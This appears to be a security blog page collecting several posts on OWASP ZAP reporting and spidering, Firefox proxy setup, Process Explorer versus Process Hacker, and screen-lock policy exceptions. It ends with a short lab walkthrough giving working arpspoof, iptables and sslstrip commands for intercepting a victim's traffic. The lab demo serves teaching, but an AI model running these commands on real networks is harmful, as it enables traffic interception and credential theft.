Practical Security Testing For Developers Using OWASP ZAP at Dot Net Bangalore 3rd meet up on Feb 21 2015
|Title||Practical Security Testing for Developers using OWASP ZAP|
|Abstract||Every time an application faces the world wide web, it inherently becomes vulnerable to attacks. The attackers could be script kiddies, joyriders, turning from hobbyists to downright hostile. The earlier in the development cycle you find the vulnerabilities, the better they are to fix and test. OWASP ZAP is a free and open source penetration testing tool for finding vulnerabilities in web applications; widely used by security professionals, it is also ideal for anyone new to web application security and includes features specifically aimed at developers. This session shows/demonstrates some attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.|
|Gist||See live attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.|
|Time & Venue||21 Feb 2015 @ Dot Net Bangalore 2nd meet up|
Ok, may be the title is a bit misleading. The below post is going to show you a few workarounds that you can use to generate (or mimic) a html report when running OWASP ZAP automated in a headless mode.
Zed Attack Proxy (ZAP), as of version 2.3.1 stable release, provides options to generate an Xml report and an html report for the alerts found. We could get these two reports from the UI via the Report menu.
One of the unique features of ZAP is the REST API that aids in automating scans. When running ZAP in daemon mode and pivoting ZAP from the REST APIs, there is a number of ways to harvest the alerts identified by ZAP.
Here’s a couple of them:
- alerts based on id (http://localhost:7070/UI/core/view/alert/)
- alerts for the baseurl (http://localhost:7070/UI/core/view/alerts/)
- xmlreport (http://localhost:7070/UI/core/other/xmlreport/) [Same as clicking Report –> Generate Xml Report…]
Using the API and your favorite programming language, you could very well gather the alerts and decide what you want to do with it.
One convenience is just pulling a html report out of the scan and mail the application owners or ourselves so they could be fixed. There is an enhancement request open in the projects page – https://code.google.com/p/zaproxy/issues/detail?id=1355
Until the feature is available in the next stable release, I decided to love with a couple of workarounds. There is a workaround in python, there is also a workaround in an exe format (written in C#). They are not perfect in terms of formatting, but they are close enough to the original html report generated through the ZAP UI.
Download from here – https://github.com/gmaran23/HtmlReportThroughZapAPIs
A python script to inject an xslt stylesheet into the xml report file generated through the API. Use the sample function to insert the sample (ZapReport.xslt) into the xml file generated. Needless to say that the ZapReport.xslt and the xmlreportfile should be in the same location.
If needed to email the xml report, we can zip the xml report with the xslt file, so when unzipped the xslt file resides in the same location as the xml file.
When the xml file is opened in Firefox, or IE –> see the formatting in action! (Does not work in chrome though )
There is also another xslt template available from https://code.google.com/p/zaproxy/source/browse/trunk/src/xml/report.html.xsl
Use the command line program named XmlToHtmlWithXSLT.exe (requires .Net 4.0) as below to obtain a html report as output.
If you don’t have .Net 4.0, use the source below to recompile to any .Net version.
Untill, the enhancement request (https://code.google.com/p/zaproxy/issues/detail?id=1355) is completed, these are some workarounds that I personally could live with, may be you can too, for your automating needs .
Plug-n-Hack introduces and proposes new standards to integrate security tools with the browsers, enabling communication between them. OWASP ZAP has inbuilt support for Plug-n-Hack (pnh) which allows you to configure Firefox to change it’s proxy settings so that OWASP ZAP could watch the FireFox traffic.
Configuration is a child’s play. Point your browser to the ZAP proxy address, follow instructions, and you are done. Just like the gif image below.
This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.
But, out of curiosity if you went and changed the FireFox proxy settings to No Proxy or Auto-detect proxy settings for this network or Use system proxy settings then the FireFox traffic would not be proxied through ZAP which is expected, Right? That works just fine.
However, when you want Firefox traffic to be proxied through ZAP again, you would copy paste the ZAP proxy address (http://localhost:7070/pnh) in Firefox again, and Firefox would then say A provider with this name has already been configured
What is your expectation now?
I don’t know, as a user my expectation when I pasted the http://localhost:7070/pnh url in Firefox is that it should configure my Browser to route it’s traffic via ZAP. But that does not happen.
How to fix?
You can override the proxy settings yourself. Or you could actually use pnh to clear and remove a configuration and then point Firefox to http://localhost:7070/pnh
Shift + F2 in Firefox and then two commands for you:
Windows changes with every version and the UI gets twisted and twisted, for a computer user that works with command line for administrative tasks, things are pretty much the same.
If you want to gather the list of MAC address on a particular computer run wither of the below commands:
2. find on ipconfig –all.
Originally posted on chentiangemalc:
Process Explorer the tool we’ve all come to love as “Task Manager on Steroids” has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!
By version 2.01 it had been renamed to HandleEx added some more process properties and kill feature.
It wasn’t until 16 June 2001 when Version 5.0 came out that it got renamed to Process Explorer. ( I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case as of May 2011 with version 14.12 the tool has come a long way to be one of the most advanced “task manager” tools available:
However an open source project has been working on a competing product since…
View original 1,637 more words
Originally posted on chentiangemalc:
Continuing from Part 1 here http://chentiangemalc.wordpress.com/2011/06/13/process-explorer-vs-process-hackerpart-1-of-2/ we will now compare more advanced features of Process Explorer & Process Hacker.
Run As Options
Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”.While Process Hacker has “Run”, “Run As Limited User”, and “Run As”
In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.
However Process Hacker’s Run As is the most powerful with many special options…
User name can be any standard user name but also can include special accounts such as:
We can also select what “type”
Specific sessions can be targeted
as well as Desktops…
Finding Open Handles/DLLs
In Process Hacker this is found via Hacker | Find Handles or DLLs menu option, in Process Explorer it is via Find | Find Handle or DLL
The main difference here is…
View original 757 more words
This article was originally published for www.prowareness.com and could be located at http://www.prowareness.com/blog/does-your-autolock-domain-workstation-policy-fail-sometimes-but-why/
The “Password Protect Screensaver” and the “Screen Saver Timeout” controlled by the group policy enables the screen saver to kick in at the specified interval of inactivity and on resume
displays the logon screen and so the workstation needs to be unlocked.
Then the normal procedure if you are doing it for the first time, you do a GPUDATE /FORCE. The policy would work like expected, however if some users/managers keep quibbling about their workstation not getting locked after the specified interval, check if any of the below exceptions apply.
- There is a video playing in YouTube or any website that uses flash based or html5 video player. This should be the active window.
- There is a video playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
- There is an audio playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
- There is an automated test running. Desktop app automation or browser automation.
- A PowerPoint slideshow in progress.
The moment a computer is joined to a domain domain the policy would be effective and in case it did not work then it could be because of the above exceptions or the computer was not a part of the domain. The exceptions are asserted based on the fact that they let the operating system know that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen get’s locked while you are enjoying a movie or you are in the middle of a presentation.
OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)
0. Make sure you are proxying via Zap (I love FoxyProxy)
1. Identify the session cookie
1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]
1.2 go do some browsing
2. Set an active session from the Http Sessions tab
3. Identify and exclude the Log off request from the spider (and scanner, and proxy, ir required)
Good luck with your Ajax spidering in ZAP!
You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?
Victim – Windows 7 – 192.168.100.11
Attacker – Kali linux – 192.168.100.215
arpspoof gateway – 192.168.100.1
•Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
•Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.100.11 192.168.100.1
•Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip.py -l <listenPort>